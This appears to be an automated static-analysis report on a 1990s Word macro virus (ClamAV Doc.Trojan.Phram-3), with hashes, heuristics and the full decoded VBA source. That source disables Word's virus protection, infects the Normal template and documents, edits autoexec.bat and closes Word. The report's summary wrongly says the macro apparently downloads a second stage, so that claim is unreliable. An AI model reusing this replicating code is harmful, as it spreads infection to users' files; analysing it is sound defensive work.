Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b6bcb46ab4c790e5…

MALICIOUS

Office (OLE)

36.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f26f6370290a64fed27cd30c54a498ad SHA-1: 2d73c0fa1f660742234fb6e4ec2c36b90dc73d2a SHA-256: b6bcb46ab4c790e596b8808bb4c2a91032c22ede6d7f4d68539fb489e6bbed1e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The script attempts to establish persistence by writing a value to the registry key HKCU\Software\Microsoft\Office\yGen with the data 'phraming the world into the next millenium'. The macro code is truncated, but the presence of the Document_Open macro and the registry modification strongly suggest it is designed to download and execute a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Phram-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Phram-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9580 bytes
SHA-256: 2d661f4a49b2115352f15e885306010be849e781a85f6a0725afc2a82fa9882c
Detection
ClamAV: Doc.Trojan.Phram-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()

'MyName = yGen
'WrittenBy = f0re

On Error Resume Next

CommandBars("Tools").Controls("macro").Visible = False
Application.EnableCancelKey = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "yGen") <> "phraming the world into the next millenium" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "yGen") = "phraming the world into the next millenium"
End If

NormalInstalled = False
ActiveInstalled = False

Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule

If NT.Lines(3, 1) = "'MyName = yGen" Then NormalInstalled = True
If AD.Lines(3, 1) = "'MyName = yGen" Then ActiveInstalled = True

If NormalInstalled = True And ActiveInstalled = True Then GoTo PhrameEnd

If NormalInstalled = False Then
    Set Infection = NT
    Set Carrier = AD
    Vircode = "Sub Document_Open()" & Chr(13) & Chr(10)
Else
    Set Infection = AD
    Set Carrier = NT
    Vircode = "Sub Document_Close()" & Chr(13) & Chr(10)
End If

With Carrier
    For X = 2 To .CountOfLines
        Vircode = Vircode & .Lines(X, 1) & Chr(13) & Chr(10)
        If .Lines(X, 1) = "End Sub" Then Exit For
    Next X
End With

With Infection
        .DeleteLines 1, .CountOfLines
        .InsertLines 1, Vircode
End With

If Norminstalled = False Then NormalTemplate.Save
If ActiveInstalled = False Then ActiveDocument.Save

PhrameEnd:

Root = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "SystemRoot")
Targ = Mid(Root, 1, 3)

Open Targ + "autoexec.bat" For Append As #1
        Print #1, "pause"
Close #1

Rndnm = Int((Rnd() * 15) + 1)
If Rndnm = 15 Then

    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    Selection.Font.ColorIndex = wdWhite
    Selection.TypeText "phraming the world into the next millenium"
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.HomeKey Unit:=wdLine
    Selection.MoveRight Unit:=wdCharacter, Count:=42, Extend:=wdExtend
    Selection.LanguageID = wdNoProofing
    Selection.HomeKey Unit:=wdStory

    ToolsCustomizeKeyboard.KeyCode = 27
    ToolsCustomizeKeyboard.Category = 1
    ToolsCustomizeKeyboard.Name = "Cancel"
    ToolsCustomizeKeyboard.Remove
    ToolsCustomizeKeyboard.Context = 0
    
    SendKeys "%" + "{F4}"

End If

End Sub


' Processing file: /opt/analyzer/scan_staging/4f111f88c05247eea09de74c37c6b8f1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5010 bytes
' Line #0:
' 	FuncDefn (Sub Document_Close())
' Line #1:
' Line #2:
' 	QuoteRem 0x0000 0x000D "MyName = yGen"
' Line #3:
' 	QuoteRem 0x0000 0x0010 "WrittenBy = f0re"
' Line #4:
' Line #5:
' 	OnError (Resume Next) 
' Line #6:
' Line #7:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Visible 
' Line #8:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #9:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #10:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #11:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #12:
' Line #13:
' 	LitStr 0x0000 ""
' 	LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\"
' 	LitStr 0x0004 "yGen"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x002A "phraming the world into the next millenium"
' 	Ne 
' 	IfBlock 
' Line #14:
' 	LitStr 0x002A "phraming the world into the next millenium"
' 	LitStr 0x0000 ""
' 	LitStr 0
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.